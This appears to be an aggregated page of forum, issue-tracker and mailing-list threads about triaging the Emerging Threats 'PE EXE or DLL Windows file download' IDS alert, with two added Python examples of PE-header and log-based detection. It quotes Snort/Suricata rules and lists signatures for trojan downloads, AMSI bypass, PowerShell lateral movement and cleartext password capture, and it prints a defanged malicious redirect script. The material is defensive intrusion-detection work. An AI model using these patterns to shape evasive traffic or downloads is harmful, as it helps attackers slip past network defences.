I have a UniFi Security Gateway (USG Pro 4P) and just enabled IPS (intrusion prevention system). I am seeing many "ET POLICY PE EXE or DLL Windows file download HTTP" alerts. I have not been able to find any more information on that alert. Should I worry about these alerts or whitelist them? The destinations are all over the world, so I am concerned.
asked Jan 31, 2019 at 14:53
The "ET POLICY" part of the alert is telling you that it's a 'Policy' rule: i.e. it's not an attack per se, it's just something which might violate a corporate policy.
That particular alert is just telling you that someone has downloaded a Windows executable file or DLL over HTTP. In most cases this is just noise, unless you’ve prohibited downloading of executable files in your environment.
answered Jul 1, 2019 at 6:45
Ford
You should contact the provider of your appliance and inform them about the case. On the other hand, you could try to capture (Wireshark, tcpdump, etc.) some of the traffic that is generating the issue and try to analyze it, probably with your appliance provider or by yourself. It could be a false positive, or your systems could be under attack or infected.
answered Jan 31, 2019 at 15:03
camp0
That is normal to be seen if you have configured .exe filtering. The alert just informs you that there has been a blocked attempt to retrieve an .exe, which is not allowed by the policy.
The actual problem seems to be that the same IP is trying to get the .exes. So if there's a user there that wants to download something, then just go tell him that what he wants is not allowed. If the system acts by itself, it may be infected with something trying to connect to a download site to further infect your system.
Additional note: the IPs on the list do not appear to be on any C&C blacklists from what I quickly checked.
answered Jul 1, 2019 at 7:00
Overmind
polonus (Avast Überevangelist, Probably Bot, Posts: 33489, malware fighter)
What is ET POLICY PE EXE or DLL Windows file download threat alert?
on: September 16, 2014, 06:21:41 PM
see: https://www.virustotal.com/nl/url/fe20ec02eb19ccdaf0119acd4b1d80021c01d161b49e76edffcc210ec0c8e664/analysis/
and
http://urlquery.net/report.php?id=1410873099312
and http://www.herdprotect.com/ip-address-54.164.159.131.aspx
Verdict there is: Inconclusive.
also for IP IDS alerts for: ET INFO EXE - Served Attached HTTP flow:to_client,established - misc, activity, characteristic for downloader exploits. -PHP 5.3.3 ibase_gen_id() off-by-one Overflow Vulnerability · php. & http://blog.benjaminwalters.net/?p=22139 (info credits: Mu)
http://nginx.org/en/security_advisories.html
Script to download video converter ->
Code:
    window.onload = function ()
    {
        window.location = 'htxp://www.hdrunnerz.com/yt_downloader_v3?aflt=CD1&mt_aflt=CD5&src=version5';
    }
Still only Emsisoft to flag: https://www.virustotal.com/nl/url/05b87e5686488b6a04cc18d7f8e8f2ad84483735668aa1aa561449820f6e56aa/analysis/1410883913/ external link:
wXw.trustedleadtracking.com/lead/e2c4w274c4w2x2/&aid= benign
[nothing detected] (jsvar) wXw.trustedleadtracking.com/lead/e2c4w274c4w2x2/&aid=
status: (referer=wXw.hdrunnerz.com/v3/js/scripts.js)
[javascript variable] URL=wXCw.trustedleadtracking.com/lead/e2c4w274c4w2x2/&aid=
Please be aware The data shown here represents the data for the parent website trustedleadtracking dot com. As this website is a sub-domain, the actual creator/administrator of the website may be different to this data shown. ..hidden owner.
polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
Potential problem with detecting Windows EXE download (closed)
Description
Hi,
I am using SELKS 2.0, recently upgraded, no changes to default settings.
I have noticed something strange with the ET Policy alert related to Windows download.
Basically, if I update one of my Windows boxes, it downloads around 30 exe/DLL files, but Suricata only generates 2 alerts: 2018959
There should be dozens of alert generated!
On a different NSM using Snort, monitoring the same network, I get what is expected, 30 or 40 alerts. The alerts I get are in fact different; they fire rule 2000419.
Something a bit more confusing, If I look for rule 2000419 in Suricata, I can’t find it!
but rule 2018959 does reference rule 2000419, as shown here:
scirius.rules:alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET POLICY PE EXE or DLL Windows file download HTTP"; flow:established,to_client; flowbits:isnotset,ET.http.binary; file_data; content:"MZ"; within:2; byte_jump:4,58,relative,little; content:"PE|00 00|"; distance:-64; within:4; flowbits:set,ET.http.binary; reference:url,doc.emergingthreats.net/bin/view/Main/2000419; classtype:policy-violation; sid:2018959; rev:2;)
I don’t understand why:
- I can't find rule 2000419 in Suricata (has it been superseded by 2018959? But I thought Suricata and Snort were using the same ET rule set).
- Why don't I get all the warnings in Suricata? Is it some kind of setting in /etc/suricata/suricata.yaml? If so, could you please help me see all the warnings and not just 2?
This is Suricata version 2.1dev (rev 834c366)
Thanks.
B.
- File windows_2000419.pcap added
Issue confirmed and pcap attached.
Using tcpreplay with this pcap triggers alert 2000419 in snort but nothing in Suricata…
I think I noticed the same issue with OSX download not being detected in Suricata either… so might be a bigger problem?
- Tracker changed from Bug to Support
It looks like the issue here is that SELKS (and/or ET) doesn’t enable this rule by default. I don’t know how SELKS handles this, perhaps you can report it to the SELKS project https://github.com/StamusNetworks/SELKS/issues
Thanks Victor, I have just done that and will let you know if it is indeed a problem with SELKS.
But you are right, the rule is just not there…
And 2000419 is different from 2018959, slightly but I suspect enough for not triggering those events!
- Target version deleted (3.0RC1)
- Status changed from New to Closed
Ian, Jun 23, 2017, 7:11:41 PM, to security-onion
I’ve been trying to figure out how best to deal with the false positives that always show up when there are updates from Microsoft.
The rule is simple enough — just search for the PE header:
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET POLICY PE EXE or DLL Windows file download"; flow:established,to_client; content:"MZ"; byte_jump:4,58,relative,little; content:"PE|00 00|"; distance:-64; within:4; flowbits:set,ET.http.binary; reference:url,doc.emergingthreats.net/bin/view/Main/2000419; classtype:policy-violation; sid:2000419; rev:22;)
What I'd like to do however is exempt something like "Host: au.download.windowsupdate.com" and I'd normally do that by modifying the rule in modifysid.conf, however, when this rule triggers, the captured packet doesn't have that host line; that host line happens in an earlier separate packet.
Is there a way to reference that host line from a previous packet? Otherwise, how do you guys work around this type of false positive issue?
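The signature quoted above (and its Suricata counterpart, sid 2018959, quoted in the Redmine issue earlier on this page) does one thing: it looks for "MZ" at the start of the response body, reads the little-endian DWORD at offset 0x3C (e_lfanew) and requires "PE\0\0" exactly at that offset. The following Python is an added example, not code from the thread or from Emerging Threats; it re-implements that check over constructed byte strings so you can see why an HTTP response body alone can match, and why the request's Host header is simply not part of the data the rule inspects. The sample PE stub and HTTP responses are constructed inline.

```python
import struct

MZ_MAGIC = b"MZ"
PE_MAGIC = b"PE\x00\x00"
E_LFANEW_OFFSET = 0x3C  # 2 bytes of "MZ" + the rule's byte_jump offset of 58


def looks_like_pe(data: bytes) -> bool:
    """True when `data` starts like a Windows PE image.

    Mirrors the signature body: "MZ" in the first two bytes, then the
    little-endian DWORD at 0x3C (e_lfanew) gives the offset at which
    "PE\\0\\0" must appear. The rule's distance:-64; within:4 pins the
    signature to exactly that offset, so the slice below is exact too.
    """
    if len(data) < E_LFANEW_OFFSET + 4 or data[:2] != MZ_MAGIC:
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, E_LFANEW_OFFSET)
    # A truncated body or an e_lfanew past the end yields a short slice -> False.
    return data[e_lfanew:e_lfanew + 4] == PE_MAGIC


def http_response_body(raw: bytes) -> bytes:
    """Return the body of a raw HTTP response (what file_data exposes).

    The request headers, including Host, travel in the other direction and
    are never part of this buffer.
    """
    _head, sep, body = raw.partition(b"\r\n\r\n")
    return body if sep else b""


def response_carries_pe(raw: bytes) -> bool:
    """What the policy rule decides for a single HTTP response."""
    return looks_like_pe(http_response_body(raw))


def build_sample_pe(e_lfanew: int = 0x80) -> bytes:
    """Constructed sample: a DOS header plus the PE signature, nothing more.

    Not an executable, just enough header to exercise the check. e_lfanew
    must not overlap the field at 0x3C..0x3F.
    """
    buf = bytearray(e_lfanew + len(PE_MAGIC))
    buf[0:2] = MZ_MAGIC
    struct.pack_into("<I", buf, E_LFANEW_OFFSET, e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = PE_MAGIC
    return bytes(buf)


# Constructed samples: a PE download, a DOS-era MZ file (e_lfanew == 0, so no
# PE signature) and an HTML page that merely contains the letters MZ.
SAMPLE_PE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n"
    + build_sample_pe()
)
SAMPLE_DOS_ONLY = b"MZ" + b"\x00" * 62
SAMPLE_HTML_RESPONSE = b"HTTP/1.1 200 OK\r\n\r\n<html>MZ</html>"

if __name__ == "__main__":
    print("pe response  ->", response_carries_pe(SAMPLE_PE_RESPONSE))
    print("html response->", response_carries_pe(SAMPLE_HTML_RESPONSE))
    print("dos-only file->", looks_like_pe(SAMPLE_DOS_ONLY))
```

Because the match is decided entirely on the first bytes of the response body, any exemption by server name has to come from state carried over from the request side (Suricata's `http.host` buffer on the request, a flowbit, or a rule variable such as the SAFE_HOSTS idea discussed later in this thread), not from the packet that fired the alert.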
Doug Burks, Jun 24, 2017, 4:01:59 AM, to securit…@googlegroups.com
Hi Ian,
Technically, this isn't a false positive, it's just a "less interesting" EXE.
One option here is to disable/suppress this alert altogether and instead rely on Bro's EXE detection and then use ELSA to stack the relevant Bro logs looking for interesting sites. That's why we provide by default an ELSA query called "HTTP - Top Sites Hosting EXEs" because windowsupdate.com, java.com, adobe.com and other "expected" download sites are going to bubble to the top of the groupby allowing you to look towards the bottom of the list and find the more suspicious sites. If you want to look beyond just HTTP traffic, you can go to "Files - Top MIME Types", then click "application/x-dosexec", then groupby source, and then drill into the non-HTTP protocols.
—
Doug Burks
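The stacking approach Doug describes does not need ELSA; it is a group-by over the Bro (now Zeek) HTTP log. The block below is an added example, not Security Onion's or Zeek's code: it parses a constructed Zeek-format http.log excerpt (tab-separated, `#fields` header, `-` for unset, comma-joined sets), keeps only responses whose `resp_mime_types` contains `application/x-dosexec`, and counts them by `host`, most frequent first, so that expected download sites float to the top and one-off sources sit at the bottom. Host names and addresses in the sample are constructed (RFC 5737 documentation ranges), not a real capture.

```python
from collections import Counter

# Constructed Zeek http.log excerpt in Zeek's tab-separated layout. The host
# names stand in for the "expected" download sites named in the thread;
# 203.0.113.7 is the odd one out. Nothing here is real traffic.
SAMPLE_HTTP_LOG = "\n".join(
    "\t".join(cols)
    for cols in [
        ["#fields", "ts", "uid", "id.orig_h", "id.resp_h", "host", "uri", "resp_mime_types"],
        ["1498262001.1", "CA1", "10.0.0.5", "192.0.2.10", "download.windowsupdate.com", "/d/kb1.exe", "application/x-dosexec"],
        ["1498262002.2", "CA2", "10.0.0.6", "192.0.2.10", "download.windowsupdate.com", "/d/kb2.exe", "application/x-dosexec"],
        ["1498262003.3", "CA3", "10.0.0.7", "192.0.2.10", "download.windowsupdate.com", "/d/kb3.exe", "application/x-dosexec"],
        ["1498262004.4", "CA4", "10.0.0.5", "192.0.2.20", "java.com", "/jre-8.exe", "application/x-dosexec"],
        ["1498262005.5", "CA5", "10.0.0.8", "192.0.2.20", "java.com", "/jre-8.exe", "application/x-dosexec"],
        ["1498262006.6", "CA6", "10.0.0.9", "192.0.2.30", "adobe.com", "/reader.exe", "application/x-dosexec"],
        ["1498262007.7", "CA7", "10.0.0.5", "203.0.113.7", "203.0.113.7", "/update.exe", "application/x-dosexec"],
        ["1498262008.8", "CA8", "10.0.0.5", "192.0.2.20", "java.com", "/", "text/html"],
        ["1498262009.9", "CA9", "10.0.0.6", "192.0.2.10", "download.windowsupdate.com", "/", "-"],
    ]
) + "\n"

EXE_MIME = "application/x-dosexec"


def parse_zeek_tsv(text: str) -> list[dict]:
    """Parse Zeek's ASCII log format into a list of row dicts.

    Column names come from the '#fields' line; other '#' lines are metadata.
    """
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def zeek_set(value: str) -> set[str]:
    """Decode a Zeek set[string] column ('-' / '(empty)' mean no value)."""
    return set() if value in ("-", "(empty)") else set(value.split(","))


def top_exe_sites(log_text: str, mime: str = EXE_MIME) -> list[tuple[str, int]]:
    """Group EXE-serving responses by Host, most frequent first (ties by name)."""
    counts: Counter = Counter()
    for row in parse_zeek_tsv(log_text):
        if mime in zeek_set(row.get("resp_mime_types", "-")):
            counts[row["host"]] += 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def rare_exe_sites(log_text: str, max_count: int = 1) -> list[str]:
    """The bottom of the stack: hosts that served an EXE at most max_count times."""
    return [host for host, n in top_exe_sites(log_text) if n <= max_count]


if __name__ == "__main__":
    for host, n in top_exe_sites(SAMPLE_HTTP_LOG):
        print(f"{n:4d}  {host}")
    print("review first:", rare_exe_sites(SAMPLE_HTTP_LOG))
```

For the non-HTTP case Doug mentions, the same grouping works over files.log with `mime_type` and `tx_hosts` in place of `resp_mime_types` and `host`; the parser above reads that file unchanged.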
Jon Mark Allen, Jun 24, 2017, 8:41:32 PM, to security-onion
Ian,
I wrote a script to help me with this issue. It doesn’t suppress the alerts, but it does help me triage them quickly. It also includes other SIDs alerting on similar activities.
https://geekcabi.net/article/security-onion-validate-exe-download-alerts/
Assuming I’m satisfied with the results, I can then go back into Squert and acknowledge any of the associated alerts.
The script does cheat a bit, since it’s doing SQL queries in combination with grep’ing the Bro logs. We don’t use ELSA, but once ELK is integrated into the Onion, I’m guessing I won’t need this anymore, but for now it’s worked for me.
HTH,
JM
Ian, Jun 25, 2017, 8:37:25 PM, to security-onion
On Friday, June 23, 2017 at 6:01:59 PM UTC-7, Doug Burks wrote:
> Hi Ian,
>
> Technically, this isn’t a false positive, it’s just a «less interesting» EXE
Doesn’t squert classify a match of this rule as malicious?
Has anyone messed with the flow/stream following that Suricata is supposed to do? I was wondering if it is possible to create an additional rule where I can regex for hosts that are reasonably safe and somehow set a flag or variable, then modify rules like "ET Policy PE EXE or DLL Windows file download" to check for that flag.
Ian, Jun 25, 2017, 8:45:03 PM, to security-onion
Jon,
I'll take a look at the script, thanks for that, but I'm looking to see if I can solve this in "real-time" if possible.
I did have a question about your grep line that matches for sids to search for. It looks like it matches lines like this:
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ETPRO TROJAN Cerber Ransomware Macro EXE Download"; flow:established,to_server; content:"HEAD"; nocase; http_method; content:".mov"; http_uri; pcre:"/.mov$/Ui"; content:"User-Agent|3a 20|Microsoft BITS/"; fast_pattern:7,20; classtype:trojan-activity; sid:2821344; rev:2;)
If a trojan is being downloaded, even from trusted hosts, I’d think I’d want to be notified regardless.
Ian, Jun 25, 2017, 9:03:20 PM, to security-onion
JM, Jun 25, 2017, 9:51:13 PM, to securit…@googlegroups.com
Yes, the grep to identify SIDs would match, but the goal of the script is only to help triage these alerts. I usually only run this script after I’ve already reviewed alerts that jumped out at me (like a Trojan download). But your point is fair.
If you wanted to exclude the ETPRO TROJAN sids, you could modify the grep line:
grep -Ei '(exe|dll).*download' /etc/nsm/rules/*.rules | grep -vi 'trojan' | grep -Po 'sid:[0-9]+' | cut -f2 -d: > ~/sids
But how would you define hosts "that are reasonably safe"?
If it's a small set you could set a local rules variable (e.g. SAFE_HOSTS) populated with your safe IPs and use modifysid to s/EXTERNAL_NET/!$SAFE_HOSTS/ and thus exclude those downloads. Of course, that's not a silver bullet, either.
> "If a trojan is being downloaded, even from trusted hosts, I'd think I'd want to be notified regardless."
Both flowbits or rule variables are vulnerable to this. If one of your «trusted hosts» were compromised and started serving malware, you still wouldn’t see the alert.
The best real-time solution that doesn’t succumb to this issue is an in-line antivirus/malware scanner/malware sandbox solution, in conjunction with the NIDS. (Not that those are without their problems either…
JM
Ian, Jun 25, 2017, 10:16:44 PM, to security-onion
JM,
Some of the rules are looking for policy violations (This host is downloading executables!), and some are looking for malicious content (This host is downloading a virus (which may be an executable)!).
I’d only use this for the policy violation type rules. The assumption here is that if the exe is something more than an exe, the other rules will still trigger.
On Sunday, June 25, 2017 at 11:51:13 AM UTC-7, Jon Mark Allen wrote:
> But how would you define hosts "that are reasonably safe"?
> Both flowbits or rule variables are vulnerable to this. If one of your "trusted hosts" were compromised and started serving malware, you still wouldn't see the alert.
Et policy cleartext wordpress login
Protecting WordPress with Suricata
There aren't any silver bullets that will protect a WordPress installation against every single attack, but adding a full-featured IDPS solution like Suricata is a good step in protecting not only that "all too many times vulnerable" WordPress installation but also other services like SSH.
Most WordPress installations are run as a single machine with a complete middleware stack from the web server down to the database. As such, what follows is based on the following assumptions:
- Middleware stack is already installed, fully functional and based on LEMP
- OS is Enterprise Linux 7 based (minimum version for the Linux Kernel is 3.14)
- HTTP traffic is received using TLS
- Nftables user space tools are installed
- Suricata is already installed (minimum version is 2.1beta3)
- ETOpen rule set has been installed in order for Suricata to use it
- Everything is running in the same host
- The host is a dedicated server or a VPS
The first step is to replace the location section of the server block that listens to HTTPS and passes the requests to PHP, in order to reverse proxy them instead.
Next we need to configure Nginx to listen locally for the decrypted traffic and to pass it to PHP.
After checking that the configuration is correct, restart Nginx. From this point onwards, there should be plain-text HTTP traffic flowing to the socket listening locally (generate some traffic if needed). You can confirm this by using tcpdump.
The next step is to configure Netfilter using Nftables, in order for it to send traffic to Suricata. To do that, create a file with the .rules extension under the /etc/nftables/ directory.
After starting the Nftables service, the next step is to configure Suricata. First edit the main Suricata configuration file (/etc/suricata/suricata.yaml).
Second, edit the system Suricata configuration file (/etc/sysconfig/suricata).
After starting Suricata, check that everything worked out without errors and that packets are being received (check the /var/log/suricata/stats.log file). To test the installation, use the following SQLi vector.
If everything worked as planned, Suricata should have created an entry in the EVE log (/var/log/suricata/eve.json) reporting the attack.
The next step is to configure the rules to disable false positives:
- 2003508 — ET WEB_SPECIFIC_APPS WordPress wp-login.php redirect_to credentials stealing attempt
- 2012843 — ET POLICY Cleartext WordPress Login
- 2012998 — ET WEB_SERVER PHP Possible https Local File Inclusion Attempt
- 2013505 — ET POLICY GNULinux YUM User-Agent Outbound likely related to package management
And change some useful rules from alert to drop :
- 2001219 — ET SCAN Potential SSH Scan
- 2006546 — ET SCAN LibSSH Based Frequent SSH Connections Likely BruteForce Attack
- 2019876 — ET SCAN SSH BruteForce Tool with fake PUTTY version
- Every rule from:
- ciarmy.rules
- compromised.rules
- drop.rules
- dshield.rules
- emerging-web_server.rules
- emerging-web_specific_apps.rules
Restart Suricata and that’s it. It’s a good idea to update the rules every now and then so that Suricata can better protect WordPress 🙂
Source
whotwagner/suricata
This gem offers classes for parsing suricata logfiles. It ships with a nagios-plugin.
Add this line to your application’s Gemfile:
And then execute:
Or install it yourself as:
This gem comes with a Nagios-plugin to search suricata’s fast-logfile for specific strings in the threat-description.
It is possible to interactively acknowledge search hits so that they will not occur on the next search:
This gem comes with a logfile analyzer for suricata’s fast.log. It’s very easy to use and meant for using as a daily cronjob
After checking out the repo, run bin/setup to install dependencies. Then, run rake spec to run the tests. You can also run bin/console for an interactive prompt that will allow you to experiment.
Bug reports and pull requests are welcome on GitHub at https://github.com/whotwagner/suricata.
Source
timestamp in alert_fast output totally wrong #121
The timestamp in the alert_fast output of Barnyard 2.13 is totally wrong outputting random timestamps as you can see below:
Is this a bug or did I maybe misconfigure something? I am using Snort 2.9.6.2.
Which branch did you use 2-1.13 or 2-1.13-bug-fix-release?
Also note that the logged time comes from the packet time.
void LogTimeStamp(TextLog* log, Packet* p)
{
    char timestamp[TIMEBUF_SIZE];
    ts_print((struct timeval*)&p->pkth->ts, timestamp);
    TextLog_Puts(log, timestamp);
}
On Wed, Oct 8, 2014 at 12:56 PM, Hosting Nuggets notifications@github.com wrote:
The timestamp in the alert_fast output of Barnyard 2.13 is totally wrong outputting random timestamps as you can see below:
06/30/125553653-00:55:10. [**] [1:2003195:5] ET POLICY Unusual number of DNS No Such Name Responses [**] [Classification: Potentially Bad Traffic] [Priority: 2] X.X.X.X:53 -> X.X.X.X:60653
03/20/120794163-02:09:56. [**] [1:2012843:2] ET POLICY Cleartext WordPress Login [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] X.X.X.X:59209 -> X.X.X.X:80
Is this a bug or did I maybe misconfigure something? I am using Snort 2.9.6.2.
I used the v2-1.13 release (https://github.com/firnsy/barnyard2/archive/v2-1.13.tar.gz) and now just tried out your bug-fix-release as such:
but unfortunately I still get the random dates in the timestamp.
As previously said.
Also note that the logged time comes from the packet time.
void LogTimeStamp(TextLog* log, Packet* p)
{
    char timestamp[TIMEBUF_SIZE];
    ts_print((struct timeval*)&p->pkth->ts, timestamp);
    TextLog_Puts(log, timestamp);
}
On Thu, Oct 9, 2014 at 5:46 AM, Hosting Nuggets notifications@github.com wrote:
git clone https://github.com/binf/barnyard2
git branch remotes/origin/bug-fix-release
git checkout remotes/origin/bug-fix-release
export AUTOCONF_VERSION=2.69
export AUTOMAKE_VERSION=1.14
./autogen.sh
./configure --with-mysql
make
sudo make install
but unfortunately I still get the random dates in the timestamp.
Sorry, I am no developer here. All I know is that on the snort side the packet timestamp gets logged correctly, but when it gets picked up by barnyard2 it ends up all messed up in barnyard2's alert file.
Here is an example of snort’s alert file which includes the correct timestamp:
Is it possible that the time zone that snort is logging with is different from what barnyard interprets it as?
This would be a more likely scenario if they are running under different users, e.g. snort as root and barnyard as hostingnuggets, where each user has a different configured time zone.
I don’t think it has anything to do with timezone as the timestamp is totally random. As an example here below are the last three entries:
If it was a timezone problem there shouldn’t be such a random pattern in the timestamp.
What is the output you get when you check your unified2 file with u2spewfoo
and u2boat.
Also can you attach a sample u2 file so we can check?
On Tue, Oct 28, 2014 at 9:51 AM, Hosting Nuggets notifications@github.com wrote:
I don't think it has anything to do with timezone as the timestamp is totally random. As an example here below are the last three entries:
06/13-18:20:13.000159 [**] [1:2403319:1363] ET CINS Active Threat Intelligence Poor Reputation IP UDP group 10 [**] [Classification: Misc Attack] [Priority: 2] X.X.X.X:40000 -> X.X.X.X:88
11/22-14:04:14.000108 [**] [1:2000328:12] ET POLICY Outbound Multiple Non-SMTP Server Emails [**] [Classification: Misc activity] [Priority: 3] X.X.X.X:46557 -> X.X.X.X:25
09/01-21:23:57.000651 [**] [1:2012843:2] ET POLICY Cleartext WordPress Login [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] X.X.X.X:20557 -> X.X.X.X:80
If it was a timezone problem there shouldn't be such a random pattern in the timestamp.
Using u2spewfoo I can see the "event second" field of each event incrementing, which shows that the timestamps are not random in snort's unified2 file, example:
Using u2boat I converted an archived snort unified2 file and then had a quick look at it using tcpdump, but can't see any issues there either with the timestamp, as they all increment nicely and have the right date too:
Source
suricata-sample-data / samples / wrccdc-2017 / references.md
sid: 2000355 signature: «ET CHAT IRC authorization message» [ «http://doc.emergingthreats.net/2000355» ]
sid: 2001239 signature: «ET POLICY Cisco Device in Config Mode» [ «http://doc.emergingthreats.net/bin/view/Main/2001239» ]
sid: 2001240 signature: «ET POLICY Cisco Device New Config Built» [ «http://doc.emergingthreats.net/bin/view/Main/2001240» ]
sid: 2001569 signature: «ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection» [ «http://doc.emergingthreats.net/2001569» ]
sid: 2001579 signature: «ET SCAN Behavioral Unusual Port 139 traffic Potential Scan or Infection» [ «http://doc.emergingthreats.net/2001579» ]
sid: 2001580 signature: «ET SCAN Behavioral Unusual Port 137 traffic Potential Scan or Infection» [ «http://doc.emergingthreats.net/2001580» ]
sid: 2001581 signature: «ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection» [ «http://doc.emergingthreats.net/2001581» ]
sid: 2001582 signature: «ET SCAN Behavioral Unusual Port 1434 traffic Potential Scan or Infection» [ «http://doc.emergingthreats.net/2001582» ]
sid: 2001583 signature: «ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection» [ «http://doc.emergingthreats.net/2001583» ]
sid: 2002023 signature: «ET CHAT IRC USER command» [ «http://doc.emergingthreats.net/2002023» ]
sid: 2002024 signature: «ET CHAT IRC NICK command» [ «http://doc.emergingthreats.net/2002024» ]
sid: 2002025 signature: «ET CHAT IRC JOIN command» [ «http://doc.emergingthreats.net/2002025» ]
sid: 2002026 signature: «ET CHAT IRC PRIVMSG command» [ «http://doc.emergingthreats.net/2002026» ]
sid: 2006380 signature: «ET POLICY Outgoing Basic Auth Base64 HTTP Password detected unencrypted» [ «http://doc.emergingthreats.net/bin/view/Main/2006380» ]
sid: 2008119 signature: «ET TFTP Outbound TFTP Error Message» [ «http://doc.emergingthreats.net/2008119» ]
sid: 2008986 signature: «ET POLICY IP Check Domain (whatismyip in HTTP Host)» null
sid: 2010645 signature: «ET POLICY User-Agent (Launcher)» [ «http://doc.emergingthreats.net/2010645» ]
sid: 2012648 signature: «ET POLICY Dropbox Client Broadcasting» null
sid: 2012843 signature: «ET POLICY Cleartext WordPress Login» null
sid: 2012886 signature: «ET POLICY Http Client Body contains passwd= in cleartext» null
sid: 2012887 signature: «ET POLICY Http Client Body contains pass= in cleartext» null
sid: 2012888 signature: «ET POLICY Http Client Body contains pwd= in cleartext» null
sid: 2013031 signature: «ET POLICY Python-urllib/ Suspicious User Agent» [ «http://www.useragentstring.com/pages/useragentstring.php» ]
sid: 2013504 signature: «ET POLICY GNU/Linux APT User-Agent Outbound likely related to package management» [ «http://help.ubuntu.com/community/AptGet/Howto» ]
sid: 2013505 signature: «ET POLICY GNU/Linux YUM User-Agent Outbound likely related to package management» [ «http://www.phy.duke.edu/
sid: 2013721 signature: «ET TROJAN Suspicious User-Agent (WindowsNT) With No Separating Space» null
sid: 2013926 signature: «ET POLICY HTTP traffic on port 443 (POST)» null
sid: 2014726 signature: «ET POLICY Outdated Flash Version M1» [ «http://www.adobe.com/software/flash/about/» ]
sid: 2014799 signature: «ET POLICY OpenVPN Update Check» null
sid: 2014932 signature: «ET POLICY DynDNS CheckIp External IP Address Server Response» null
sid: 2014939 signature: «ET POLICY DNS Query for TOR Hidden Domain .onion Accessible Via TOR» [ «http://en.wikipedia.org/wiki/.onion» ]
sid: 2014941 signature: «ET POLICY TOR .exit Pseudo TLD DNS Query» [ «http://en.wikipedia.org/wiki/.onion» ]
sid: 2015856 signature: «ET SNMP Attempt to retrieve Cisco Config via TFTP (CISCO-CONFIG-COPY)» null
sid: 2016778 signature: «ET DNS Query to a *.pw domain — Likely Hostile» null
sid: 2017025 signature: «ET ATTACK_RESPONSE Net User Command Response» null
sid: 2018170 signature: «ET POLICY Application Crash Report Sent to Microsoft» null
sid: 2018572 signature: «ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families) » null
sid: 2018789 signature: «ET POLICY TLS possible TOR SSL traffic» null
sid: 2018959 signature: «ET POLICY PE EXE or DLL Windows file download HTTP» [ «http://doc.emergingthreats.net/bin/view/Main/2000419» ]
sid: 2019091 signature: «ET EXPLOIT Metasploit Random Base CharCode JS Encoded String» null
sid: 2019232 signature: «ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers» [ «http://blogs.akamai.com/2014/09/environment-bashing.html» ]
sid: 2019236 signature: «ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Version Number» [ «http://blogs.akamai.com/2014/09/environment-bashing.html» ]
sid: 2019239 signature: «ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie» [ «http://blogs.akamai.com/2014/09/environment-bashing.html» ]
sid: 2019512 signature: «ET POLICY Possible IP Check api.ipify.org» null
sid: 2019714 signature: «ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile» null
sid: 2020475 signature: «ET POLICY Metasploit Framework Checking For Update» null
sid: 2020565 signature: «ET POLICY Dropbox DNS Lookup — Possible Offsite File Backup in Use» [ «http://dropbox.com» ]
sid: 2020912 signature: «ET WEB_SERVER Possible IIS Integer Overflow DoS (CVE-2015-1635)» [ «http://cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1635» ]
sid: 2022114 signature: «ET EXPLOIT Serialized Java Object Calling Common Collection Function» [ «http://github.com/foxglovesec/JavaUnserializeExploits» ]
sid: 2022520 signature: «ET POLICY Possible HTA Application Download» [ «http://www.trustedsec.com/july-2015/malicious-htas/» ]
sid: 2022896 signature: «ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016» null
sid: 2022973 signature: «ET POLICY Possible Kali Linux hostname in DHCP Request Packet» [ «http://www.kali.org» ]
sid: 2024364 signature: «ET SCAN Possible Nmap User-Agent Observed» null
sid: 2024379 signature: «ET POLICY Outdated Flash Version M2» [ «http://www.adobe.com/software/flash/about/» ]
sid: 2024535 signature: «ET CURRENT_EVENTS Possible AMSI Powershell Bypass Attempt B642» null
sid: 2025061 signature: «ET WEB_CLIENT PowerShell call in script 1» null
sid: 2025062 signature: «ET WEB_CLIENT PowerShell call in script 2» null
sid: 2025521 signature: «ET EXPLOIT Cisco Smart Install Exploitation Tool — ChangeConfig» [ «http://www.us-cert.gov/ncas/alerts/TA18-106A», «http://github.com/Sab0tag3d/SIET» ]
sid: 2025699 signature: «ET POLICY SMB Executable File Transfer» null
sid: 2025701 signature: «ET POLICY SMB2 NT Create AndX Request For an Executable File» null
sid: 2025705 signature: «ET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File» null
sid: 2025707 signature: «ET POLICY SMB2 NT Create AndX Request For a .bat File» null
sid: 2025709 signature: «ET POLICY SMB2 NT Create AndX Request For a DLL File — Possible Lateral Movement» null
sid: 2025713 signature: «ET POLICY SMB2 Remote AT Scheduled Job Create Request» null
sid: 2025714 signature: «ET POLICY SMB Remote AT Scheduled Job Pipe Creation» null
sid: 2025719 signature: «ET POLICY Powershell Activity Over SMB — Likely Lateral Movement» null
sid: 2025720 signature: «ET POLICY Powershell Command With Hidden Window Argument Over SMB — Likely Lateral Movement» null
sid: 2025722 signature: «ET POLICY Powershell Command With No Profile Argument Over SMB — Likely Lateral Movement» null
sid: 2100230 signature: «GPL CHAT Jabber/Google Talk Outgoing Traffic» [ «http://www.google.com/talk/» ]
sid: 2100232 signature: «GPL CHAT Google Talk Logon» [ «http://www.google.com/talk/» ]
sid: 2100498 signature: «GPL ATTACK_RESPONSE id check returned root» null
sid: 2100877 signature: «GPL CHAT Google Talk Startup» null
